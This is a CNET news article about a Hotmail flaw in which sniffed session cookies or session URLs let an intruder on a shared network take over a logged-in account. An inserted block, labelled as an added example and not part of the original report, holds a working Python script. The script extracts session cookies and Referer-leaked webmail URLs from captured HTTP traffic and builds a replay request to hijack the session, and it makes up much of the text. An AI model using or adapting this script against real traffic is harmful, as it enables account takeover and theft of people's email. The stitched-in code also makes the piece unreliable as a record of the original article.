Another security hole in Hotmail

The free emailer acknowledges a security problem that could compromise user accounts in corporate computing environments.

Paul Festa, Staff Writer, CNET News.com. Festa covers browser development and Web standards.
Microsoft's Hotmail has acknowledged a security problem with its Web-based email service that could compromise the accounts of users in corporate computing environments.

The current problem comes on the heels of a series of bugs that plagued Hotmail and other Web-based free email providers last month.

Hotmail downplayed its own responsibility for the current problem, however, characterizing it as "largely a network security issue."

"It appears that if you're in an insecure network, behind a firewall with another user, that second user can 'sniff' the traffic, including the Hotmail URL or the cookie, as long as the first user is still logged onto the service," said Sean Fee, director of product marketing at Hotmail.

Fee was referring to the practice of "packet sniffing," or monitoring data as it passes through a network.

Fee said the intruder could access another account behind the same firewall in one of two ways.

One is to swipe the cookie, the small record that Hotmail sets in the user's browser to identify the logged-in session. Hotmail and other free email providers rely on cookies rather than on the client's network address because computers in corporate and other network environments usually receive IP (Internet protocol) addresses dynamically from a pool, rather than having one fixed address per computer, so the address cannot be trusted to identify a user.

The other way is to steal the Web address, or URL, that the browser and Hotmail exchange during a session. Because the URL itself carries the session identifier, an intruder who cuts and pastes it into a browser window before the victim's session expires is taken straight into the account. Both paths work for the same reason: the cookie and the URL are the session's credentials, and on an unencrypted network segment they travel in the clear, where any other machine on that segment can capture them.

Hotmail's present security problem bears some resemblance to a hole BellSouth fixed last month. In that case, BellSouth Web mail URLs were showing up in the server logs of third-party Web sites that Web mail users visited directly from their accounts, because the browser passes the address of the page it came from, in the Referer header, along with each outgoing request.
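To make the two exposure paths concrete, the following is an added example, not code from the article, from Hotmail or from BellSouth. It takes a constructed capture of cleartext HTTP requests as they would appear on a shared network segment, pulls out the session cookie and the session-bearing URL sent to the webmail host (the two things Fee describes an intruder sniffing), and also pulls the webmail URL out of the Referer header of a request to a third-party site (the BellSouth-style leak), then builds the request an intruder would replay. The hostnames (`webmail.example`, `news.example`), the cookie name `SID` and the URL parameter `session` are assumptions chosen for illustration, not Hotmail's real identifiers.

```python
"""Session hijacking from cleartext HTTP: extract replayable credentials
from traffic captured on a shared network segment.

Added example, not code from the original article or from Hotmail.
The host names, cookie name and URL parameter name below are assumed for
illustration and are not Hotmail's real identifiers.
"""
from urllib.parse import urlsplit, parse_qs

WEBMAIL_HOST = "webmail.example"   # assumed webmail host
SESSION_COOKIE = "SID"             # assumed name of the session cookie
SESSION_PARAM = "session"          # assumed URL parameter carrying the session id

# Constructed capture: two requests as they would appear on the wire over
# plain HTTP. The first goes to the webmail host; the second goes to a
# third-party site reached by clicking a link inside the mailbox, so the
# browser sends the mailbox URL in the Referer header.
CAPTURE = (
    "GET /cgi-bin/inbox?session=9f3c2a7d&folder=INBOX HTTP/1.0\r\n"
    "Host: webmail.example\r\n"
    "Cookie: SID=9f3c2a7d; lang=en\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "\r\n"
    "GET /article.html HTTP/1.0\r\n"
    "Host: news.example\r\n"
    "Referer: http://webmail.example/cgi-bin/inbox?session=9f3c2a7d&folder=INBOX\r\n"
    "\r\n"
)


def parse_requests(raw):
    """Split a cleartext capture into (request_line, headers) tuples."""
    requests = []
    for chunk in raw.split("\r\n\r\n"):
        if not chunk.strip():
            continue
        lines = chunk.split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append((lines[0], headers))
    return requests


def parse_cookie(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def session_from_url(url_or_path):
    """Return the session id carried in the query string, or None."""
    query = parse_qs(urlsplit(url_or_path).query)
    values = query.get(SESSION_PARAM)
    return values[0] if values else None


def extract_session_material(raw):
    """Collect everything in the capture that lets a bystander impersonate
    the victim: session cookies and session-bearing URLs sent to the webmail
    host, plus webmail URLs leaked through Referer headers of requests to
    other hosts. Returns a dict of sorted lists keyed by kind."""
    found = {"cookie": set(), "url": set(), "referer": set()}
    for request_line, headers in parse_requests(raw):
        _method, path, _version = request_line.split()
        host = headers.get("host", "")
        if host == WEBMAIL_HOST:
            cookies = parse_cookie(headers.get("cookie", ""))
            if SESSION_COOKIE in cookies:
                found["cookie"].add(cookies[SESSION_COOKIE])
            if session_from_url(path):
                found["url"].add("http://%s%s" % (host, path))
        else:
            referer = headers.get("referer", "")
            if urlsplit(referer).hostname == WEBMAIL_HOST and session_from_url(referer):
                found["referer"].add(referer)
    return {kind: sorted(items) for kind, items in found.items()}


def replay_request(url, session_cookie):
    """Build the request an intruder would send (or paste as a URL) to take
    over the live session. It only works while the victim is still logged
    in, which is why logging out closes the window of exposure."""
    parts = urlsplit(url)
    path = parts.path + ("?" + parts.query if parts.query else "")
    return (
        "GET %s HTTP/1.0\r\n"
        "Host: %s\r\n"
        "Cookie: %s=%s\r\n"
        "\r\n" % (path, parts.hostname, SESSION_COOKIE, session_cookie)
    )


if __name__ == "__main__":
    material = extract_session_material(CAPTURE)
    for kind, items in material.items():
        for item in items:
            print("%-8s %s" % (kind, item))
    print(replay_request(material["url"][0], material["cookie"][0]))
```

Run as a script, it lists the one session cookie, the one session-bearing webmail URL and the same URL recovered from the Referer header, then prints the replay request. Note that the third-party site in the capture never needed to sniff anything: the session URL arrived in its own logs, which is the distinction between the BellSouth leak and the sniffing case Fee describes.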

In this case, however, Fee stressed that only users in "insecure networks" were at risk.

The security hole also resembles problems that both Excite and Hotmail have faced with the exposure of users' Web mail addresses and other personal information. In this case, however, intruders can not only glean addresses and information, but also gain complete control over the user's account, letting them read, delete, and send mail under the victim's name.

The problem is the subject of a Web page by Chee Mun Kean, a computer science student in Kuala Lumpur.

Both Fee and Chee recommended that users log out after completing their Hotmail sessions, because intruders can only take advantage of this problem if the account holder's session is still active. Hotmail sessions last two hours unless the user logs out or shuts down the browser.

Fee said Hotmail engineers were examining Chee's description of the problem.

"We will see if there are any appropriate steps that we can take to help minimize user risk," he added.